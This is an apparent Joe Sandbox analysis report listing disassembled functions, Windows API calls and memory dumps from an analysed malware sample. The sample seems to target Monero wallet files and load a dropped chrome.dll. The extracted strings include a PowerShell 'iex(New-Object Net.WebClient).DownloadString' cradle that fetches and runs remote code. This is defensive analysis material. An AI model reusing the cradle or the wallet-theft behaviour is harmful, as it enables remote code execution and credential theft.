                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: 8ead1b7ea8c15a0e20f43a73dde82ebbee25859465cd62dc1cd03539650fd54d
                                        • Instruction ID: 28f51adb6a4e271b758d8a555276ce7171614c8d45f0656d178b09e797f6aaa8
                                        • Opcode Fuzzy Hash: 8ead1b7ea8c15a0e20f43a73dde82ebbee25859465cd62dc1cd03539650fd54d
                                        • Instruction Fuzzy Hash: 3741CC71D102089ADF14EBA0C8A2BEDB779BF24300F804559F1166B192DF716A4DCFD5
                                        Function 001FCBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: f17f523cb94ebd8a2783a5996797ad3b763c54ac58e5e2f770485607960de433
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 5821CF72D0062DAFDB219F19CE41A7F3A79EB91BA4F064119FA1CA7211C3308D41ABE0
                                        Function 00196BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00196C0C
                                        • sscanf.NTDLL ref: 00196C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00196C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00196C60
                                        • ExitProcess.KERNEL32 ref: 00196C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: dee319b46c13bd87f6f786dd1c9dca694b7f2ca8d6c0f2166abaa0e284bbd74e
                                        • Instruction ID: fd1b68f449fc95791a1ed19a2d88719118a3f2b59041c4783825c5d36a622c3f
                                        • Opcode Fuzzy Hash: dee319b46c13bd87f6f786dd1c9dca694b7f2ca8d6c0f2166abaa0e284bbd74e
                                        • Instruction Fuzzy Hash: 2B21CB75D14208ABCF04EFE4E8459EEB7B9BF48301F04856AF506A3251EB349608CB69
                                        Function 00197F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,011BC278,00000000,00020119,?), ref: 00197FEE
                                        • RegQueryValueExA.ADVAPI32(?,011CD720,00000000,00000000,000000FF,000000FF), ref: 0019800F
                                        • RegCloseKey.ADVAPI32(?), ref: 00198022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 5c0b58d7d41a9dfe9f8dd35f42fa6ebb4be9ee0521729a89c10292d86c9a721c
                                        • Instruction ID: 094bff37d3861f50dd3047c10fcf3caa5cd3aa0d90f55d3623597ef060403857
                                        • Opcode Fuzzy Hash: 5c0b58d7d41a9dfe9f8dd35f42fa6ebb4be9ee0521729a89c10292d86c9a721c
                                        • Instruction Fuzzy Hash: 82115EB1A44305EBDB04CF94ED86FBFBBB8FB05B11F104269F615A7281DB7599008BA1
                                        Function 001993F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • StrStrA.SHLWAPI(011CDFC0,00000000,00000000,?,00189F71,00000000,011CDFC0,00000000), ref: 001993FC
                                        • lstrcpyn.KERNEL32(00457580,011CDFC0,011CDFC0,?,00189F71,00000000,011CDFC0), ref: 00199420
                                        • lstrlen.KERNEL32(00000000,?,00189F71,00000000,011CDFC0), ref: 00199437
                                        • wsprintfA.USER32 ref: 00199457
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: e6119adc49f3a8cbaf9b72b3284f5db59326118f226687558081ba164e39342d
                                        • Instruction ID: 5b59bc6003b4c084bc48b7cd6fb4a8a51ba9262103c683f26d18891779da37a9
                                        • Opcode Fuzzy Hash: e6119adc49f3a8cbaf9b72b3284f5db59326118f226687558081ba164e39342d
                                        • Instruction Fuzzy Hash: 45011E7550420CFFCB04DFA8D948EAE7B78EB48305F108668F9098B341D735EA44DB94
                                        Function 001812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001812B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001812BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001812D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001812F5
                                        • RegCloseKey.ADVAPI32(?), ref: 001812FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 33733dbf63e61f3aa42a1bd038a09b27d1f7b321b4f48c95c3af5eec1dd08452
                                        • Instruction ID: 554c3fcabe2125b53626a529ce689a7067cb410af6e0890128283f2ee64c5074
                                        • Opcode Fuzzy Hash: 33733dbf63e61f3aa42a1bd038a09b27d1f7b321b4f48c95c3af5eec1dd08452
                                        • Instruction Fuzzy Hash: 3701CD79A44309BBDB14DFE4EC89FAE777CAB48701F1041A5FA0597281DB70DA008B94
                                        Function 001968D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00196903
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 001969C6
                                        • ExitProcess.KERNEL32 ref: 001969F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: 64790e7f138a609cb8f6c7b57c5121e30db176b7b72ebe1b4512395984862a4b
                                        • Instruction ID: 93711a0e6fbe9fbe231fe1c34d461371ac9254a089f2acbb9a948395c95ce347
                                        • Opcode Fuzzy Hash: 64790e7f138a609cb8f6c7b57c5121e30db176b7b72ebe1b4512395984862a4b
                                        • Instruction Fuzzy Hash: D93110B1901218ABDB14EB90DD92FDDB778AF64300F804199F20667191DF74AB48CFA9
                                        Function 00198950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0E10,00000000,?), ref: 001989BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001989C6
                                        • wsprintfA.USER32 ref: 001989E0
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 0fc59ac3ba6835626e57ce0e3e70f1fcf6abfddc48c8445777368c56c870dff8
                                        • Instruction ID: c2d97794f764f20bf3a8e31c74ba9c7b2e46ac7b828376c35b14abc01326f0f0
                                        • Opcode Fuzzy Hash: 0fc59ac3ba6835626e57ce0e3e70f1fcf6abfddc48c8445777368c56c870dff8
                                        • Instruction Fuzzy Hash: D72172B1A44304BFDB00DF94ED45FAEBBB8FB49701F108169F605A7281C775A900CBA4
                                        Function 0018A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0018A098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: e32b6b46878d94a248071269bae7c1e70f022b485975c76ebda75ef60d9d96d8
                                        • Instruction ID: 086785997470d5dc207a0554814506c2cfe52f5751f8d714a7bd4ef0a1ecd1e1
                                        • Opcode Fuzzy Hash: e32b6b46878d94a248071269bae7c1e70f022b485975c76ebda75ef60d9d96d8
                                        • Instruction Fuzzy Hash: 94F03A7468D304AFE710AB60FD4CBAA36E8E705B42F501536F409972E2C3B4D984CF6A
                                        Function 00198EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001996AE,00000000), ref: 00198EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00198EF2
                                        • wsprintfW.USER32 ref: 00198F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 2490ad8e9aa73109e277d04d33719ca4bed09ed41f83d4cb2a334c0c5af9a83f
                                        • Instruction ID: 67b43d080d5595f0b7c9e48a1e2b9b503b918394903869b87d1f346eb3e3402a
                                        • Opcode Fuzzy Hash: 2490ad8e9aa73109e277d04d33719ca4bed09ed41f83d4cb2a334c0c5af9a83f
                                        • Instruction Fuzzy Hash: 6DE0EC75A48309BBDB10DB94ED4AE6D7BBCEB09702F0041B4FD0A97341DA719E109B99
                                        Function 0018A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0018AA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0018AB2F
                                        • lstrlen.KERNEL32(00000000), ref: 0018ADEC
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 0018AE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
